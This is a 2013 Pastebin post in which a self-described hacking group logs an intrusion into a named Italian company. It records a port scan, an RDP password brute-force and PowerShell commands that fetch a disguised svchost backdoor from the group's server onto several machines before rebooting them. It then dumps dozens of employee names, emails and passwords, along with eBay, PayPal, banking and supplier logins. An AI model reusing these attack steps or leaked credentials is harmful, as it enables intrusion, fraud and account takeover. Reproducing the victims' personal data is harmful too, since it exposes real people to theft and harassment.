API tools faq
paste
Advertisement
Guest User

logs

a guest
Aug 30th, 2013
535
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.78 KB | None | 0 0
raw download clone embed print report
  1. _______ _____ _ _______
  2. |__ __| | __ \| | |__ __|
  3. | |_ _| |__) | | __ | | ___ __ _ _ __ ___
  4. | | | | | _ /| |/ / | |/ _ \/ _` | '_ ` _ \
  5. | | |_| | | \ \| < | | __/ (_| | | | | | |
  6. |_|\__,_|_| \_\_|\_\ |_|\___|\__,_|_| |_| |_|
  7.  
  8. Website: turkhackarmy.org
  9.  
  10. New target: nuovacosmo.dlinkddns.com
  11.  
  12. --- PING 2.112.52.162 (2.112.52.162) 56(84) bytes of data. ---
  13. 64 bytes from 2.112.52.162: icmp_req=1 ttl=49 time=6.23 ms
  14. 64 bytes from 2.112.52.162: icmp_req=2 ttl=49 time=6.44 ms
  15. 64 bytes from 2.112.52.162: icmp_req=3 ttl=49 time=6.29 ms
  16. 64 bytes from 2.112.52.162: icmp_req=4 ttl=49 time=6.58 ms
  17.  
  18. ./SWhois 2.112.52.162
  19. route: 2.112.0.0/15
  20. descr: INTERBUSINESS
  21. id: AS3269
  22. origin: ibs-resid.milano26.mil.seabone.net
  23. name: Nuova Cosmo S.r.l.
  24. organization: Nuova Cosmo S.r.l.
  25. address: Via Giuseppe di Vittorio, 17, Inzago Milano
  26. telephone: +00390295310298
  27.  
  28. ./nmap -F -T5 -Pn -sS 2.112.52.162
  29. Host is up (0.016s latency).
  30. PORT STATE SERVICE
  31. 21/tcp open ftp
  32. 3389/tcp open RDP (Remote Desktop Microsoft)
  33.  
  34. Nmap done: 1 IP address (1 host up) scanned in 9.17 seconds
  35.  
  36. WOAH nice!
  37.  
  38. ./rdp_bruteforce 2.112.52.162 administrator passwlist.txt
  39. [+]Starting!
  40. ...................................................Found! (5043 sec)
  41. [!][email protected] PWD='inzago2010' !
  42. [-]Finish.
  43.  
  44. ./rdp_client Administrator:[email protected]
  45. Connecting..
  46. Connected.
  47.  
  48. WTF? too easy :/
  49. There's a lot of pc with no-login shared directory..
  50.  
  51. Network>
  52.  
  53. DAVIDE \DOCUMENTI
  54. ELENA-PC \UTENTI \DOCUMENTI-ELE \DOWNLOADS \SCANSIONI
  55. SERVER2 \BANCHE \DOCUMENTI \C (DRIVE)
  56. SERVER \BACKUP \UTENTI
  57. ASSISTENZA \C (DRIVE) \D (DRIVE) \E (DRIVE)
  58. PIA-PC \
  59. DIREZIONE \CONDIVISA
  60. COMMERCIALE \DRIVE \DOCUMENTI
  61. OFFICINA \
  62. USER-PC \
  63. SEGRETERIA \C (DRIVE)
  64.  
  65. PS C:\> Invoke-WebRequest http:\\netshare.turkhackarmy.org\elon\svchost_variant.exe -OutFile \\ASSISTENZA\WINDOWS\SYSTEM32\SVCHOST.EXE
  66. PS C:\> Invoke-WebRequest http:\\netshare.turkhackarmy.org\elon\svchost_variant.exe -OutFile \\SERVER2\WINDOWS\SYSTEM32\SVCHOST.EXE
  67. PS C:\> Invoke-WebRequest http:\\netshare.turkhackarmy.org\elon\svchost_variant.exe -OutFile \\SEGRETERIA\WINDOWS\SYSTEM32\SVCHOST.EXE
  68. PS C:\> shutdown -R -M \\ASSISTENZA -t 0
  69. PS C:\> shutdown -R -M \\SERVER2 -t 0
  70. PS C:\> shutdown -R -M \\SEGRETERIA -t 0
  71.  
  72. Worked, backdoor installed.
  73. G0T R00T !
  74.  
  75. Files and infos gained:
  76.  
  77. Marcello Direzione 192.168.0.7 ollecram [email protected] ollecram
  78. Marcello Direzione 192.168.0.7 ollecram [email protected] work2009
  79. Marcello Direzione 192.168.0.7 ollecram [email protected] marcello54
  80. Matteo Assistenza 192.168.0.1 ingrid [email protected] work2009
  81. Carlo Segreteria 192.168.0.2 malto2006 [email protected] carlo86
  82. Pia Commerciale 192.168.0.3 no [email protected] work2011
  83. Davide Ordini 192.168.0.115 davide [email protected] ollecram
  84. Elena Server cagnolino [email protected] elena
  85. Francesco NC COMMERC 23122000 [email protected] fra nc2006
  86. Luisa NC CONTAB cassano2006 [email protected] inzago2010
  87. IP CAM expo 192.168.0.20 no
  88. Officina Officina 192.168.0.117 officina no officina
  89. EBAY nuovacosmo 2010work
  90. EBAY workservices work2009
  91. Username: [email protected] Password: workservices
  92. Paypal [email protected] 2010work
  93.  
  94. [email protected] zh?9Eqx(?12!
  95. [email protected] zh?9Eqx(?12!
  96. [email protected] !qazmlp!
  97. [email protected] !qazmlp!
  98. [email protected] !qazmlp!
  99. [email protected] !qazmlp!
  100. [email protected] ollecram!
  101. [email protected] ollecram!
  102. [email protected] ollecram!
  103. [email protected] ollecram!
  104. [email protected] ollecram!
  105. [email protected] work2012
  106. 192.168.1.254 admin atlantis
  107. 192.168.1.110 admin workservices
  108. 192.168.1.109 admin workservices
  109.  
  110.  
  111. http://hosting.aruba.it/ [email protected] 0la47pqx31
  112. http://hosting.aruba.it/ [email protected] 73avb14hxwe
  113. http://it.adveovision.net/Login.aspx 5010120 schiavonepia work2012!
  114. http://www.esprinet.com/public/ 1602147001 work2012
  115. http://www.brevi.it/ CLI7088 03368170969
  116. http://www.techdata.it/Pages/Start.aspx 594274 2010work
  117. http://www.datamatic.it/private/home/ 946683 work2012!
  118. http://www.acquistinretepa.it/opencms/ SCHMRP000 Workservices2013
  119. https://signin.ebay.it/ws/eBayISAPI.dll nuovacosmo ymzx735qmgf
  120. https://signin.ebay.it/ws/eBayISAPI.dll workservices 2SrspkgsGZ
  121. https://www.paypal.com/it/cgi-bin/webscr [email protected] adgje!?thuk!qJ?
  122. https://ibbweb.tecmarket.it/ P2006371 JWB4G NCOSMO13
  123.  
  124. There's a lot of password..
  125. Hacked www.nuovacosmo.it
  126. Hacked www.workservices.it
  127. Hacked www.studiomartesana.com
  128.  
  129. [-]Attack finished.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!